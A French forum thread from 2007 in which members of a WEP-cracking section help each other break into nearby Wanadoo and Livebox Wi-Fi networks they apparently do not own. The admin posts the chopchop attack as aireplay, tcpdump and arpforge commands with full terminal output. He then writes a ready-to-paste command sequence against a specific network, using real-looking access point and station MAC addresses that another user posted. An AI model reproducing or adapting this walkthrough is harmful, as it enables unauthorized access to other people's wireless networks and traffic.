Problème de Desauth - Reauth (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-04-2007 16:18:54

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Problème de Desauth - Reauth

Resalut
  Je me heurte à un pb de Réassociation

7d5ba7ea.png

Lorsqu'une Station ex: Wanadoo_XXX ne montre pas son adresse Station ( mais qu'on la connait quand même  aq.gif 

Comment le forçer à s'associer...
  j'éssaye en même temps aireplay -1  et aireplay -0  et  j'arrive pas à faire apparaître son Essid dans le tableau du bas ...donc c'est même pas la peine de lançer aireplay-3 , je peux attendre du.gif jusqu'à demain pour les Arp
Y a -t-il un moyen ?

Dernière modification par kungfuserge (09-04-2007 16:44:15)


L'Homme sage est celui qui connait ses limites

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-04-2007 17:15:40

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Salut, je vais te donner la technique "chopchop" que j'utilise dans ce cas, et qui pour ma part fait des merveilles sous whax, si tu as un bon power au dessus de 10 ça devrait fonctionner nickel.

FORGER SES REQUETES ARP:

D'abord il faut decrypter un paquet
aireplay -4 ath0 -a "mac ap" -h "mac station"

Ensuite trouver l'ip (qui est probablement 192.168.1.1 ou 192.168.1.2
tcpdump -s 0 -n -e -r nomdupaquetdécrypté.cap

Maintenant il faut forger une requete arp
arpforge nomdupaquetdécrypté.xor 1 "mac ap" \ "mac station" 192.168.1.100 192.168.1.1 arp.cap

Maintenant on peut envoyer cette requette pour faire grimper les ivs!
aireplay -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r arp.cap ath0

En l'absence de client cette methode fonctionne aussi si on se fait passer pour un client sur un autre shell, on decrypte alors les paquets qu'on a soi meme envoyé mais ça marche!
aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station"

Voila comment faire grimper les ivs, meme sans arp et sans client c'est possible, il suffit d'avoir l'adresse mac d'une station associée à l'ap.

Note: lors du decryptage du paquet, si des lignes avec le pourcentage ne défilent pas, c'est que le paquet est foireux, tu peux en essayer un autre. Il faut parfois insister et essayer plusieurs paquet avant que ça marche. Quand ça indique "done",  alors c'est réussi, l'arp est forgée et prete pour l'injection smile!
Tiens moi au courant.
M1ck3y.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#3 09-04-2007 17:20:01

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : Problème de Desauth - Reauth

Salut M1ck3y

Bienvenue sur le forum smile

Je suis intéressé par la méthode que tu viens de décrire, si tu peux nous donner plus d'informations, ça ne serait pas refus. Je pourrais par la suite en faire un petit tutorial.

Si tu désires faire le tutorial toi même te gène pas smile

Hors Ligne

#4 09-04-2007 17:36:49

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : Problème de Desauth - Reauth

Moi je ne comprend pas ce que veux dire que kungfuserge quand il dis: "Lorsqu'une Station ex: Wanadoo_XXX ne montre pas son adresse Station "


Sinon il est bien le quartier il lui reste pas mal de wep. Chez moi c'est l'invasion de livebox en WPA...sniff

Hors Ligne

#5 09-04-2007 17:41:10

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Bien sur, dans un premier temps je vais te détailler la méthode pour aider kungfuserge, surtout que j'ai vu qu'il avait un bon power alors je te garantis qu'il va y arriver. Pour moi ça a marché 2 fois sur 2 essais, donc 100% de réussite jusque là.
D'abord, tu te fais passer pour la station avec la commande:
aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station"
Là tu t'authentifie, tu t'associes et tu envoies régulièrement des "keep alive packet" (j'ai essayé sous backtrack 2 ça a foiré peut etre parce que le power était faible, mais sous whax c'est nickel), à ce stade normalement tu te vois meme en tant que client dans ton airodump! Si c'est le cas, on poursuit:
il faut decrypter un paquet
aireplay -4 ath0 -a "mac ap" -h "mac station"
là aireplay écoutes, il surveilles les paquets qui transitent et des qu'il en chope un qui lui convient il te demande si tu veux l'utiliser, tu réponds par y ou n, y égale yes bien sur
si c'est bon, tu vois défiler des lignes pleines de chiffres, de xor et de trucs que je ne comprend pas vraiment, peu importe en fait tant que les lignes défilent en t'indiquant au fur et à mesure le pourcentage qui évolue, c'est du tout bon. Après quelques essais, si tout va bien tu vas voir s'afficher "done" et aireplay t'indique 2 noms de fichiers, un en .cap et un en .xor, ce sont les fichiers issus du decryptage du paquet.
C'est le fichier en .xor qui va te servir à forger ta requete arp. Pour l'ip, rien qu'à voir le nom de ton ap je peux te dire que c'est 192.168.1.1, tu vas donc utiliser la commande suivante pour forger ta requete arp:
arpforge nomdupaquetdécrypté.xor 1 "mac ap" \ "mac station" 192.168.1.100 192.168.1.1 arp.cap
Et maintenant, tu balances ta requete en attaque par rejeu:
aireplay -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r arp.cap ath0
Et là je veux voir un grand sourire sur le visage de kungfuserge, quand il va voir les arp grimper en fleche, AINSI QUE LES IVS!!! smile
Je n'ai rien inventé, c'est l'attaque "chopchop" de Korek, la première fois que j'ai lu un truc là dessus j'y ai rien compris, mais j'ai essayé et ça fonctionne super.
Et pour le tuto ok je veux bien, mais faudra m'aider alors.
M1ck3y.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#6 09-04-2007 17:52:00

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

ca.gif ça à l'air super...
merçi Mick3y

arpforge nomdupaquetdécrypté.xor 1 "mac ap" \ "mac station" 192.168.1.100 192.168.1.1 arp.cap

Maintenant on peut envoyer cette requette pour faire grimper les ivs!
aireplay -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r arp.cap ath0
Tu veux dire "mac ap" ou "mac station"

192.168.1.100 192.168.1.1  ( ?) les 2 ?
arp.cap .............ça c'est le nom du paquet décrypté ??

J'y retourne , moi aussi je suis sous Whax, j'utilise BT2 que pour faire fonctionner la carte Alfa 500 USB à cause du chipset Realteck
Je te tiens au courant, je ferais des copies d'écran pour montrer où ça bloque bf.gif

Dernière modification par kungfuserge (09-04-2007 17:52:55)


L'Homme sage est celui qui connait ses limites

Hors Ligne

#7 09-04-2007 17:59:34

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Tu prends mes commandes telles quelles, sur un Wanadoo_xxxx gardes ces ip ça marchera, tu n'as qu'à faire des copier coller de mes commandes, et remplacer "mac ap" par l'adresse mac de la box, "mac station" sera remplacé par l'adresse mac du client associé que tu connais déja. arp.cap est le nom de la requete arp que tu vas forger, tu peux l'appeler comme tu veux tant que c'est en .cap. Et comme tu es sous whax, je ne me fais pas trop de souci. J'ai testé backtrack 2 pour la première fois cet après midi, histoire de me familiariser avec airodump ng, je suis un peu déçu je dois dire. Je garde mon whax.
Je te précise que cette attaque, sans un "vrai" trafic sur le réseau te donnera des ivs moins diversifiés qu'une attaque classique, donc il t'en faudra peut etre plus que d'habitude pour faire péter la clé. Mais c'est aléatoire, aircrack est parfois capricieux tu verras bien.
M1ck3y.

Dernière modification par M1ck3y (09-04-2007 18:03:10)


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#8 09-04-2007 18:02:25

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

wxcvbn a écrit :

Sinon il est bien le quartier il lui reste pas mal de wep. Chez moi c'est l'invasion de livebox en WPA...sniff

Viens chez moi  lol

Dernière modification par kungfuserge (09-04-2007 18:03:19)


L'Homme sage est celui qui connait ses limites

Hors Ligne

#9 09-04-2007 18:20:36

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

TEXTE ORIGINAL:

KoreK's "chopchop" (CRC prediction)

This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This attack requires at least one WEP data packet.
First, we decrypt one packet :
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
Let's have a look at the IP address :
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
Then, forge an ARP request.
The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
And replay our forged ARP request :
aireplay -2 -r arp.cap ath0


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#10 09-04-2007 20:05:11

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Ca y est, j'ai réalisé un petit exemple. Faudra que je le refasse, là le power était trop bas et je suis pas apparu dans les stations, je referais d'autres captures d'écran, mais ça a quand meme marché:

Pas encore de tuto, mais déja ça

FORGER SES REQUETES ARP:

D'abord il faut decrypter un paquet
aireplay -4 ath0 -a "mac ap" -h "mac station"
[email protected]:/mnt/hda3# aireplay -4 ath0 -a 00:1A:6B:xx:xx:xx -h 08:10:73:xx:xx:xx
Read 1423 packets...

        Size: 88, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:1A:6B:xx:xx:xx
         Dest. MAC  =  08:10:73:xx:xx:xx
        Source MAC  =  00:19:4B:xx:xx:xx

        0x0000:  0842 d500 0810 73xx xxxx 001a 6bxx xxxx  .B....s.k...k..<
        0x0010:  0019 4b61 8d3d d031 fb62 3600 437e 514d  ..Ka.=.1.b6.C~QM
        0x0020:  9a20 76bd 9083 35d5 4675 3193 3469 daa3  . v...5.Fu1.4i..
        0x0030:  7e17 d8cd 4048 f808 e3ef 4e80 e90a 23b4  [email protected]#.
        0x0040:  de19 8508 2e9a 24d4 a184 d6e2 d1b4 b6cb  ......$.........
        0x0050:  39bb 3aa8 6179 2561                      9.:.ay%a

Use this packet ? y

Saving chosen packet in replay_src-0409-191345.cap

Offset   87 ( 0% done) | xor = BA | pt = DB |  254 frames written in  1529ms
Offset   86 ( 1% done) | xor = 08 | pt = 2D |  257 frames written in  1541ms
Offset   85 ( 3% done) | xor = E8 | pt = 91 |  612 frames written in  3673ms
Offset   84 ( 5% done) | xor = 85 | pt = E4 |  102 frames written in   611ms
Offset   83 ( 7% done) | xor = A2 | pt = 0A |  255 frames written in  1530ms
Offset   82 ( 9% done) | xor = 37 | pt = 0D |   51 frames written in   306ms
Offset   81 (11% done) | xor = 82 | pt = 39 |  204 frames written in  1225ms
Offset   80 (12% done) | xor = 0D | pt = 34 |  255 frames written in  1529ms
Offset   79 (14% done) | xor = EB | pt = 20 |   51 frames written in   306ms
Offset   78 (16% done) | xor = F1 | pt = 47 |  306 frames written in  1836ms
Offset   77 (18% done) | xor = FA | pt = 4E |  102 frames written in   612ms
Offset   76 (20% done) | xor = 80 | pt = 51 |  102 frames written in   612ms
Offset   75 (22% done) | xor = E2 | pt = 00 |  154 frames written in   924ms
Offset   74 (24% done) | xor = D6 | pt = 00 |  254 frames written in  1525ms
Offset   73 (25% done) | xor = D9 | pt = 5D |   52 frames written in   311ms
Offset   72 (27% done) | xor = CD | pt = 6C |   50 frames written in   300ms
Offset   71 (29% done) | xor = 3D | pt = E9 |  256 frames written in  1536ms
Offset   70 (31% done) | xor = D9 | pt = FD |   50 frames written in   300ms
Offset   69 (33% done) | xor = 82 | pt = 18 |  511 frames written in  3065ms
Offset   68 (35% done) | xor = 7E | pt = 50 |  203 frames written in  1219ms
Offset   67 (37% done) | xor = 8D | pt = 85 |  154 frames written in   924ms
Offset   66 (38% done) | xor = 5D | pt = D8 |  142 frames written in   851ms
Offset   65 (40% done) | xor = 02 | pt = 1B |  152 frames written in   913ms
Offset   64 (42% done) | xor = 33 | pt = ED |   88 frames written in   527ms
Offset   63 (44% done) | xor = D7 | pt = 63 |  273 frames written in  1635ms
Offset   62 (46% done) | xor = E9 | pt = CA |  224 frames written in  1344ms
Offset   61 (48% done) | xor = D7 | pt = DD |  346 frames written in  2081ms
Offset   60 (50% done) | xor = 26 | pt = CF |  245 frames written in  1469ms
Offset   59 (51% done) | xor = 19 | pt = 99 |   46 frames written in   276ms
Offset   58 (53% done) | xor = 4A | pt = 04 |  252 frames written in  1512ms
Offset   57 (55% done) | xor = A8 | pt = 47 |  270 frames written in  1621ms
Offset   56 (57% done) | xor = E4 | pt = 07 |  103 frames written in   613ms
Offset   55 (59% done) | xor = 02 | pt = 0A |   51 frames written in   306ms
Offset   54 (61% done) | xor = F9 | pt = 01 |  102 frames written in   617ms
Offset   53 (62% done) | xor = E0 | pt = A8 |   52 frames written in   311ms
Offset   52 (64% done) | xor = 80 | pt = C0 |  430 frames written in  2581ms
Offset   51 (66% done) | xor = EA | pt = 27 |  154 frames written in   924ms
Offset   50 (68% done) | xor = B7 | pt = 6F |  225 frames written in  1349ms
Offset   49 (70% done) | xor = 39 | pt = 2E |  257 frames written in  1542ms
Offset   48 (72% done) | xor = B1 | pt = CF |  103 frames written in   614ms
Offset   47 (74% done) | xor = FD | pt = 5E |  202 frames written in  1215ms
Offset   46 (75% done) | xor = 50 | pt = 8A |  196 frames written in  1173ms
Offset   45 (77% done) | xor = 6F | pt = 06 |  240 frames written in  1440ms
Offset   44 (79% done) | xor = 44 | pt = 70 |  479 frames written in  2874ms
Offset   43 (81% done) | xor = 93 | pt = 00 |  384 frames written in  2309ms
Offset   42 (83% done) | xor = 71 | pt = 40 |   52 frames written in   312ms
Offset   41 (85% done) | xor = 14 | pt = 61 |  103 frames written in   616ms
Offset   40 (87% done) | xor = C6 | pt = 80 |   43 frames written in   259ms
Offset   39 (88% done) | xor = E5 | pt = 30 |  144 frames written in   865ms
Offset   38 (90% done) | xor = 35 | pt = 00 |  257 frames written in  1541ms
Offset   37 (92% done) | xor = 83 | pt = 00 |  270 frames written in  1619ms
Offset   36 (94% done) | xor = D5 | pt = 45 |   46 frames written in   277ms
Offset   35 (96% done) | xor = BD | pt = 00 |  253 frames written in  1518ms
Offset   34 (98% done) | xor = 7E | pt = 08 |  180 frames written in  1081ms

Saving plaintext in replay_dec-0409-191509.cap   



Ensuite trouver l'ip (qui est probablement 192.168.1.1 ou 192.168.1.2
tcpdump -s 0 -n -e -r nomdupaquetdécrypté.cap
là je ne l'ai pas fait, sur les Wanadoo_xxxx et Livebox-xxxx l'ip est 192.168.1.1

Maintenant il faut forger une requete arp
arpforge nomdupaquetdécrypté.xor 1 "mac ap" \ "mac station" 192.168.1.100 192.168.1.1 arp.cap
[email protected]:~# cd /mnt/hda3
[email protected]:/mnt/hda3# arpforge replay_dec-0409-191509.xor 1 00:1A:6B:xx:xx:xx \ 08:10:73:xx:xx:xx 192.168.1.100 192.168.1.1 arp.cap
Done.

Maintenant on peut envoyer cette requette pour faire grimper les ivs!
aireplay -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r arp.cap ath0
[email protected]:/mnt/hda3# aireplay -3 -e Livebox-xxxx -a 00:1A:6B:xx:xx:xx -b 00:1A:6B:xx:xx:xx -h 08:10:73:xx:xx:xx -x600 -r arp.cap ath0
Saving ARP requests in replay_arp-0409-191840.cap
You must also start airodump to capture replies.
Read 104888 packets (got 1024 ARP requests), sent 67529 packets...

En l'absence de client cette methode fonctionne aussi si on se fait passer pour un client sur un autre shell, on decrypte alors les paquets qu'on a soi meme envoyé mais ça marche!
aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station"
Ce qui donne:

9:18:14  Association successful :-)
19:18:24  Sending keep-alive packet
19:18:34  Sending keep-alive packet
19:18:44  Sending Authentication Request
19:18:44  Authentication successful
19:18:44  Sending Association Request
19:18:44  Association successful :-)
19:18:54  Sending keep-alive packet
19:19:04  Sending keep-alive packet
19:19:14  Sending Authentication Request
19:19:14  Authentication successful
19:19:14  Sending Association Request
19:19:14  Association successful :-)
19:19:24  Sending keep-alive packet
19:19:34  Sending keep-alive packet
19:19:44  Sending Authentication Request
19:19:44  Authentication successful
19:19:44  Sending Association Request
19:19:44  Association successful :-)

Voila comment faire grimper les ivs, meme sans arp et sans client c'est possible, il suffit d'avoir l'adresse mac d'une station associée à l'ap.

Résultat dans airodump, en une dizaine de minutes

[email protected]:/mnt/hda3#
BSSID              PWR  Packets   LAN IP / # IVs  CH  MB  ENC  ESSID

  0E:74:D4:xx:xx:xx  11       43                        11  54  WEP?
  0E:74:D4:xx:xx:xx    6       29                        11  54  WEP?
  0E:74:D4:xx:xx:xx   10      173                      11  54  WEP? free
  2A:57:5A:xx:xx:xx    9       82                        11  54  WEP? freexxxxxx
  2A:57:5A:xx:xx:xx    9       46                        11  54  WEP?
  0E:74:D4:xx:xx:xx    9      161                       11  54  WEP? freexxxxx
  2A:57:5A:xx:xx:xx   11      515                      11  54  WEP? Cxxxxxx
  3A:7C:E1:xx:xx:xx   11      949                      11  54  WEP?
  3A:7C:E1:xx:xx:xx   11     1208                     11  54  WEP? freexx
  3A:7C:E1:xx:xx:xx   12      866                      11  54  WEP? freexxxxxx
  3A:7C:E1:xx:xx:xx   11      936                      11  54  WEP?
  00:1A:6B:xx:xx:xx   15    62137          52340  10  54  WEP  Livebox-xxxx
  00:07:CB:xx:xx:xx   23     5388                     11  48  WEP? xxxx
  00:16:41:xx:xx:xx  13     6410                       10  54  WEP? Wanadoo_xxxx
  00:16:41:xx:xx:xx    8     6191                       10  54  WEP? Livebox-xxxx
  00:16:41:xx:xx:xx    9     6347                       10  54  WEP? Wanadoo_xxxx

  BSSID              STATION            PWR   Packets  ESSID

[email protected]:/mnt/hda3#

Voila pour l'exemple, maintenant à vous de jouer smile
M1ck3y.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#11 09-04-2007 22:24:23

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

Arrrh !  M1ck3y ch.gif j'ai éssayer pendant 2 heures j'ai eu que des échecs
Au départ 57eee200.png

puis aireplay -4 ath0 -a Bessid -h Station

b5823bf8.png
Colere_18.gif

... et c'est pas la première fois que je m'attaque à ces stations...Colere_8.gif

Dernière modification par kungfuserge (09-04-2007 22:31:38)


L'Homme sage est celui qui connait ses limites

Hors Ligne

#12 09-04-2007 22:27:53

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : Problème de Desauth - Reauth

Idem chez moi...

Je ne sais pas d'où sa vient hmm Avec deux cartes différentes en plus... (tout les deux chipset atheros)

Hors Ligne

#13 09-04-2007 22:34:27

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

C'est frustrant !!! Confus_11.gif
Je me sens C..

Dernière modification par kungfuserge (09-04-2007 22:38:22)


L'Homme sage est celui qui connait ses limites

Hors Ligne

#14 09-04-2007 22:51:23

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

kungfuserge, je viens de voir tes captures, une chose m'échappe
sur la premiere image je te vois decrypter des paquets alors que tu ne fais pas de fake auth, forcément ça ne marchera pas
sur la 2ème image, dans ta fake auth aireplay je ne vois pas de sending keep alive packets, as tu bien tapé la commande aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station" ?
Avec des powers pareils ça ne peut que marcher, tu as du te louper quelque part si t'as msn je t'envoie mes captures d'écran tu verras par toi meme ça marche c'est garanti.
Dans l'ordre shell 1 airodump, shell2 aireplay -1 30 pour te faire passer pour le client, shell 3 aireplay -4 pour decrypter le paquet, des fois faut en decrypter plusieurs mais si tu n'y arrives pas après 2h,  y'a un truc qui tourne pas rond. Faut que je t'envoie mes captures.
M1ck3y.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#15 09-04-2007 22:56:41

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

ou alors donnes moi l'essid, la mac de l'ap, la mac de la station associée et je t'envoie toutes les commandes déja pretes. Il me vient une idée, es tu sur de ta mac station? Tu l'as eu comment?


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#16 09-04-2007 23:10:24

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

Pendant que j'envoyais  aireplay -4  je faisais tourner aireplay -1 ...j'ai pas dû le faire sur ma première image...

sur la 2ème image, dans ta fake auth aireplay je ne vois pas de sending keep alive packets, as tu bien tapé la commande aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station" ?
Euh ! j'ai pas eu sending keep alive packets ....Peut-être dois-je changer mon adresse Mac ?


mais j'ai lançer aireplay-1

en + j'ai toutes les Stations cachées , depuis que je le traque celui là...je vais réessayer demain ...
Super ton Tuto Content_7.gif ; ...;j'ai pas vu que tu lançais aireplay -1 avant aireplay -4

Dernière modification par kungfuserge (09-04-2007 23:44:46)


L'Homme sage est celui qui connait ses limites

Hors Ligne

#17 09-04-2007 23:13:38

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

ça fait 1 ans que je suis dessus ....alors on joue à cache cache lui et moi.... 1 coup il apparait l'autre c'est fini pendant plusieurs jours
Je peux t'envoyer les ESSID et les BESSID et la Station ....


L'Homme sage est celui qui connait ses limites

Hors Ligne

#18 09-04-2007 23:22:24

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

pour un PWR au dessus de 30 j'ai
Bessid                                       ESSID                                  STATION
00:16:41:0C:9E:A9                Wanadoo_2be5                        00:0B:CD:5A:5F:4A
00:03:C9:8A:61:0D                Wanadoo_3126                        00:0E:35:C8:EE:79

et mon 1er de la Classe qui n'a jamais montré sa station avec un Pwr de 38
j'ai nommé lol
00:10:C6:CB:35:F9          Wanadoo_fc4d


L'Homme sage est celui qui connait ses limites

Hors Ligne

#19 09-04-2007 23:38:48

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Ta mac station est bonne, puisque tu as association successfull, par contre tu as du lancer aireplay -1 et non pas aireplay -1 30, c'est pourquoi tu n'as pas "sending keep alive packets", je pense.
Fais scrupuleusement ce que j'ai écrit avant, tu fais copier coller avec les commandes t'as qu'à remplir ton essid, mac ap et mac station. CA DOIT MARCHER!!!!!!!
Avec des powers comme ça, des box en carton... Je ne comprend pas que tu n'y arrive pas.  Bon on va dormir et demain tu fais péter les Ivs.
M1ck3y.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#20 09-04-2007 23:43:18

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

OUI c'est vrai !!!!!!!!!!!!aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station
moi j'ai fait aireplay-1 0 -e  az.gif
A demain et merçi


L'Homme sage est celui qui connait ses limites

Hors Ligne

#21 09-04-2007 23:50:55

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Prenons Wanadoo_2be5 dans ton exemple, l'attaque donnerait ça
-shell1
airodump ath0 out 10 (je suppose que ces ap sont sur le canal 10)
-shell2
aireplay ath0 -1 30 -e Wanadoo_2be5 -a 00:16:41:0C:9E:A9 -h 00:0B:CD:5A:5F:4A
-shell3
aireplay -4 ath0 -a -00:16:41:0C:9E:A9 -h 00:0B:CD:5A:5F:4A
-shell4
arpforge nomdupaquetdécrypté.xor 1 00:16:41:0C:9E:A9 \ 00:0B:CD:5A:5F:4A 192.168.1.100 192.168.1.1 arp.cap
-shell5
aireplay -3 -e Wanadoo_2be5 -a 00:16:41:0C:9E:A9 -b 00:16:41:0C:9E:A9 -h 00:0B:CD:5A:5F:4A -x600 -r arp.cap ath0

ouf!
je t'ai mis les commandes dans 5 shells différents pour que ça soit plus clair, et dans l'ordre...
Pret? Copier, coller...


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#22 09-04-2007 23:57:38

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Problème de Desauth - Reauth

Et j'aurais un petit truc pour ton premier de la classe qui ne veut pas se montrer sous airodump. Tu connais ethereal? Je t'expliquerais ça.


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#23 10-04-2007 00:34:06

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : Problème de Desauth - Reauth

Mais c'est quoi les stations cachées ? a partir du moment où un ordi wifi est allumé on le voit non ?
La livebox a aussi le vice de pouvoir masquer la station wifi qui se connecte dessus ?  roll

Hors Ligne

#24 10-04-2007 08:35:46

kungfuserge
Membre
Lieu : Paris
Inscription : 23-03-2006
Messages : 134

Re : Problème de Desauth - Reauth

Bonjour M1ck3y smile
Je retourne en "immertion périscopique" sous whax  et je te raconte après
Je te remerçie pour tout ce que tu fais
Ps:  je ne sais pas utiliser ethereal neutral

Dernière modification par kungfuserge (10-04-2007 08:36:51)


L'Homme sage est celui qui connait ses limites

Hors Ligne

#25 10-04-2007 09:38:20

zac
Membre d'honneur
Inscription : 22-06-2006
Messages : 678

Re : Problème de Desauth - Reauth

J'ai réussi à faire fonctionner la méthode smile

Merci M1ck3y, un tutoriial est en cours.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
probleme avec backtrack 4 par perfectdin
1 2040 28-03-2017 20:05:05 par amr2017
1 936 20-03-2016 21:26:05 par M1ck3y
0 1912 27-01-2013 15:30:58 par Farame
0 2669 03-02-2012 18:24:52 par Cherouss
2 4318 27-11-2011 13:35:44 par azertov